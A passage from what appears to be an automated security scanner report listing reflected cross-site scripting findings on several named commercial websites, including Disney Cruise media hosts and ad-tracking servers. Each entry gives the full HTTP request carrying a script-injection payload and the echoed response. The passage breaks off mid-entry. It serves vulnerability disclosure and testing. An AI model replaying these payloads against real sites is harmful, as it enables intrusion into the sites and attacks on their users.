User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:19 GMT
Content-Length: 33404
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediaa1bc9"><script>alert(1)</script>077b2728ef3/dcl_v0400/Global/Promo/220x102/content-Videos.png" />
...[SNIP]...

5.40. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9295a"><script>alert(1)</script>96a168aa4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media9295a"><script>alert(1)</script>96a168aa4af/dcl_v0400/Global/Promo/906X46/visaFinancing2.png?t=1285940677233 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:52 GMT
Content-Length: 33403
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media9295a"><script>alert(1)</script>96a168aa4af/dcl_v0400/Global/Promo/906X46/visaFinancing2.png" />
...[SNIP]...

5.41. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecb43"><script>alert(1)</script>40b5281772 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaecb43"><script>alert(1)</script>40b5281772/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg?t=1278609104857 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:25 GMT
Content-Length: 102680
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediaecb43"><script>alert(1)</script>40b5281772/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg" />
...[SNIP]...

5.42. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e44b7"><script>alert(1)</script>6eb83ba471b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediae44b7"><script>alert(1)</script>6eb83ba471b/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:24 GMT
Content-Length: 102673
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediae44b7"><script>alert(1)</script>6eb83ba471b/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg" />
...[SNIP]...

5.43. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/globalHeader/logoDCL.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/globalHeader/logoDCL.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff92"><script>alert(1)</script>fd9c1d11d27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media2ff92"><script>alert(1)</script>fd9c1d11d27/dcl_v0400/Global/globalHeader/logoDCL.png?t=1242662094147 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:39 GMT
Content-Length: 102641
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media2ff92"><script>alert(1)</script>fd9c1d11d27/dcl_v0400/Global/globalHeader/logoDCL.png" />
...[SNIP]...

5.44. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9943"><script>alert(1)</script>da2cec6217b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediac9943"><script>alert(1)</script>da2cec6217b/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg?t=1302109283890 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:56 GMT
Content-Length: 102664
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediac9943"><script>alert(1)</script>da2cec6217b/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg" />
...[SNIP]...

5.45. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e20d"><script>alert(1)</script>5087c26d2bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media6e20d"><script>alert(1)</script>5087c26d2bb/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:32 GMT
Content-Length: 102701
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media6e20d"><script>alert(1)</script>5087c26d2bb/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg" />
...[SNIP]...

5.46. http://dcl2.wdpromedia.com/media/dcl_v0400/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92089"><script>alert(1)</script>c597bb81d5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media92089"><script>alert(1)</script>c597bb81d5c/dcl_v0400/favicon.ico HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:34 GMT
Content-Length: 32945
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media92089"><script>alert(1)</script>c597bb81d5c/dcl_v0400/favicon.ico" />
...[SNIP]...

5.47. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55aa9"><script>alert(1)</script>a9eabed6abe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /55aa9"><script>alert(1)</script>a9eabed6abe/concat/2.39.0.9/css?files=/global/print.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:36:08 GMT
Content-Length: 33443
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/55aa9"><script>alert(1)</script>a9eabed6abe/concat/2.39.0.9/css" />
...[SNIP]...

5.48. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15880"><script>alert(1)</script>099c91ddff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15880"><script>alert(1)</script>099c91ddff2/concat/2.39.0.9/js?files=/global/loaderInit.js HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:36:12 GMT
Content-Length: 33442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/15880"><script>alert(1)</script>099c91ddff2/concat/2.39.0.9/js" />
...[SNIP]...

5.49. http://f.nexac.com/e/a-677/s-2140.xgi [na_kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://f.nexac.com
Path:   /e/a-677/s-2140.xgi

Issue detail

The value of the na_kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19fb8"><script>alert(1)</script>ed9f7d4095b was submitted in the na_kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=19fb8"><script>alert(1)</script>ed9f7d4095b HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:37 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:37 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:37 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:37 GMT
Server: lighttpd/1.4.18
Content-Length: 425


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut: Credit Application&phint=__bk_k%3d19fb8"><script>alert(1)</script>ed9f7d4095b&limit=4" height="0" width="0" frameborder="0">
...[SNIP]...

5.50. http://f.nexac.com/e/a-677/s-2140.xgi [na_title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://f.nexac.com
Path:   /e/a-677/s-2140.xgi

Issue detail

The value of the na_title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f09c"><script>alert(1)</script>b81aaeddec was submitted in the na_title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=4f09c"><script>alert(1)</script>b81aaeddec&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:25 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:25 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:25 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:25 GMT
Server: lighttpd/1.4.18
Content-Length: 395


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3d4f09c"><script>alert(1)</script>b81aaeddec&phint=__bk_k%3d&limit=4" height="0" width="0" frameborder="0">
...[SNIP]...

5.51. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fingerhut.tt.omtrdc.net
Path:   /m2/fingerhut/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload bc9c9<script>alert(1)</script>41364d59e04 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-478846&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcomebc9c9<script>alert(1)</script>41364d59e04&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 210
Date: Mon, 16 May 2011 01:36:07 GMT
Server: Test & Target

mboxFactories.get('default').get('FHTOCP_welcomebc9c9<script>alert(1)</script>41364d59e04',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305509219944-478846.17");

5.52. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /asp/usatly/handler.ashx

Issue detail

The value of the longUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5858'%3balert(1)//02d6293dc was submitted in the longUrl parameter. This input was echoed as c5858';alert(1)//02d6293dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /asp/usatly/handler.ashx?longUrl=c5858'%3balert(1)//02d6293dc HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 138
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: private, max-age=86400
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close
Vary: Accept-Encoding

var usatlyshorturl = 'c5858';alert(1)//02d6293dc'; // Currently only the following domains are supported: usatoday.com,usatodayeducate.com

5.53. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 72b1b<script>alert(1)</script>01f0fef14a3 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

